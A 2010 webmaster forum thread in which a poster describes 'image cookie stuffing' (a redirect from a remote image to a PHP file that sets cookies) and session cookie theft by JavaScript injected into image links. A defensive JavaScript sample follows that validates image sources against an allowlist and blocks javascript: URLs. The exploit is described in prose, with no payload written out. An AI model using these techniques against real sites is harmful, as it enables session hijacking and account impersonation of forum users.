This is going way off topic.
Image cookie stuffing is not performance related ("Best ways to speed up your site" => no relevance).
Image cookie stuffing is a security hole and the only way you can really prevent it is to not trust other sites as the source of your image.
What basically happens is that the user uses the source for their image on their site, and using htaccess (or other redirect methods), they then redirect you to a PHP file that sets a cookie.
They can then set a cookie from their site on yours! (You may also need to fake the referer within that PHP file.)
So for instance I could do this by adding an image to this page from the source on my site, this would then make everyone who visited this page have a certain cookie (for example, everyone who then visited this page on your forum would be automatically logged in as Mike22 and post for me) - Not a great exploit, there are much better ones than that.
I prefer session cookie theft through images, but this is an exploit if the site calls an image incorrectly (unsafely), and allows the user to place script in the image link.
(I mentioned this on DP a while ago)
If you can find an exploit that allows you to put the link of the image, then you can add a small bit of JavaScript at the end of the image. As an example, this bit of script shows the cookie (and could potentially send the cookie to me instead of example.com):
Using Firefox, if you put the above script in the URL, press return and then scroll to the top of the page (don't worry, I haven't hacked OWF), you can see what this does <= using JavaScript in this way is known as JavaScript injection.
This really has nothing to do with image re-sizing or performance!
- If all the images are being added by the webmaster (and not the users) and you are not calling the images incorrectly, these exploits are not relevant, and certainly not relevant to the title of this thread... I don't know how we went off in that direction
[Can you use my username when quoting me from private messages, dunk3r23? Cheers]
Last edited by Mike22; 03-21-2010 at 04:04 PM.
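A defensive sketch of the two points in the post above (not trusting other sites as the source of an image, and not letting script ride along in the image link), added here as an example that is not part of the thread or of any forum software's code. The host `img.forum.example`, the function names and the sample URLs are assumptions made for illustration.

```javascript
// Added example. Hosts, names and sample inputs are constructed, not from the thread.
// Only hosts the forum itself controls: a third-party host can answer the image
// request with a redirect, and no check on the submitted URL can see that.
const ALLOWED_IMAGE_HOSTS = new Set(["img.forum.example"]);

// Returns the normalized URL if the image source is acceptable, otherwise null.
function checkImageSource(raw) {
  // Reject control characters, spaces, quotes, angle brackets and backslashes
  // up front, so nothing can break out of the src attribute.
  if (typeof raw !== "string" || /[\u0000-\u0020"'<>`\\]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw); // relative or malformed input throws
  } catch {
    return null;
  }
  if (url.protocol !== "https:") return null;       // blocks javascript:, data:, http:
  if (url.username || url.password) return null;    // no user:pass@host tricks
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return null; // exact host match only
  return url.href;
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Build the tag for a user-submitted image, or a placeholder if it is rejected.
function renderUserImage(raw) {
  const src = checkImageSource(raw);
  return src === null
    ? "[image removed]"
    : `<img src="${escapeAttr(src)}" alt="user image">`;
}

// Constructed sample inputs
console.log(renderUserImage("https://img.forum.example/avatars/42.png"));
console.log(renderUserImage("https://other-site.example/pic.jpg"));
console.log(renderUserImage("javascript:void(0)"));
```

With an allowlist like this, user images have to be uploaded to (or re-hosted on) a host the forum controls, which is what removes the remote redirect from the picture.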
You are right Mike, we are going off topic on this thread (sorry, lol), but you must agree with me that the info related to a security flaw on images is an interesting topic to discuss too (why not start a new thread regarding this issue and how to prevent it?). BTW, as usual, thanks for your tips dude.
Now can I know what image cookie stuffing is? Hearing this word for the first time ever. Kindly give me some more details if you can.